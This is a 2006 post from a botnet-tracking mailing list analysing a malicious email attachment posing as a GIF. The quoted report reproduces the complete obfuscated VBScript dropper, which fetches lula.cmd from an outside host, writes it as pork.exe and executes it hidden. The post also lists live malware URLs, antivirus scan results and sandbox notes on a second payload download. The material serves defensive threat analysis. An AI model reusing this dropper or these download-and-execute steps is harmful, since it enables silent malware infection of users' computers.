To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- Some interesting strings from lula.cmd:
http://www.lasgo.be/mp3.php?id=455 \imgrt.scr \nostd.scr \bsys.scr On Fri, Dec 29, 2006 at 12:06:43PM -0500, Tom babbled thus: > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > ---------- > This one was new to me. A gif that wasn't. Came via email. Link was > tohttp://lulavergonha.rg3.net which framed a gif > (http://mywebpage.netscape.com/lu7y7u/lula.gif) that firefox would > not deal with. DOes explorer reall open these? > > Anyway, content of gif had javascript to download the maleware > (beware below is an active link as of this email): > > <script language="VBScript"> > > on error resume next > > > > ' due to how ajax works, the file MUST be within the same local domain > dl = "http://mywebpage.netscape.com/lu7y7u/lula.cmd"; > > ' create adodbstream object > Set df = document.createElement("object") > df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" > str="Microsoft.XMLHTTP" > Set x = df.CreateObject(str,"") > > a1="Ado" > a2="db." > a3="Str" > a4="eam" > str1=a1&a2&a3&a4 > str5=str1 > set S = df.createobject(str5,"") > S.type = 1 > > ' xml ajax req > str6="GET" > x.Open str6, dl, False > x.Send > > ' Get temp directory and create our destination name > fname1="pork.exe" > set F = df.createobject("Scripting.FileSystemObject","") > set tmp = F.GetSpecialFolder(2) ' Get tmp folder > fname1= F.BuildPath(tmp,fname1) > S.open > ' open adodb stream and write contents of request to file > ' like vbs dl exec code > S.write x.responseBody > ' Saves it with CreateOverwrite flag > S.savetofile fname1,2 > > S.close > set Q = df.createobject("Shell.Application","") > Q.ShellExecute fname1,"","","open",0 > > > > </script> > > [ scan result ] > AntiVir 7.3.0.21/20061229 found [TR/Delphi.Downloader.Gen] > Authentium 4.93.8/20061229 found nothing > Avast 4.7.892.0/20061221 found nothing > AVG 386/20061229 found nothing > BitDefender 7.2/20061229 found [Trojan.Downloader.Banload.MG] > CAT-QuickHeal 8.00/20061229 found nothing > ClamAV devel-20060426/20061229 found nothing > DrWeb 4.33/20061229 found nothing > eSafe 7.0.14.0/20061228 found nothing > eTrust-InoculateIT 23.73.101/20061229 found nothing > eTrust-Vet 30.3.3289/20061229 found nothing > Ewido 4.0/20061229 found [Downloader.Delf.acn] > F-Prot 3.16f/20061229 found nothing > F-Prot4 4.2.1.29/20061229 found nothing > Fortinet 2.82.0.0/20061229 found nothing > Ikarus T3.1.0.27/20061229 found > [Trojan-Downloader.Win32.Dadobra.CV] > Kaspersky 4.0.2.24/20061229 found nothing > McAfee 4928/20061228 found nothing > Microsoft 1.1904/20061227 found nothing > NOD32v2 1946/20061229 found [probably a variant of > Win32/TrojanDownloader.Banload.BAY] > Norman 5.80.02/20061229 found [W32/Downloader] > Panda 9.0.0.4/20061228 found [Suspicious file] > Prevx1 V2/20061229 found nothing > Sophos 4.13.0/20061228 found nothing > Sunbelt 2.2.907.0/20061218 found nothing > TheHacker 6.0.3.139/20061229 found nothing > UNA 1.83/20061228 found nothing > VBA32 3.11.1/20061229 found nothing > VirusBuster 4.3.19:9/20061229 found nothing > > [ notes ] > norman sandbox: [ General information ] > * **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: > [EMAIL PROTECTED] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH > PASSWORD)**. > * File length: 43520 bytes. > > [ Changes to filesystem ] > * Creates file C:\WINDOWS\SYSTEM32\imgrt.scr. > > [ Network services ] > * Downloads file from > http://www.aquipodeserbom.xpg.com.br/firma01.bmp as > C:\WINDOWS\SYSTEM32\imgrt.scr. > > [ Security issues ] > * Starting downloaded file - potential security problem. > > > > -- > > Tom Shaw - Chief Engineer, OITC > <[EMAIL PROTECTED]>, http://www.oitc.com/ > US Phone Numbers: 321-984-3714, 321-729-6258(fax), > 321-258-2475(cell/voice mail,pager) > Text Paging: http://www.oitc.com/Pager/sendmessage.html > AIM/iChat: [EMAIL PROTECTED] > Google Talk: [EMAIL PROTECTED] > skype: trshaw -- PinkFreud Chief of Security, Nightstar IRC network irc.nightstar.net | www.nightstar.net Server Administrator - Blargh.CA.US.Nightstar.Net Unsolicited advertisements sent to this address are NOT welcome. _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
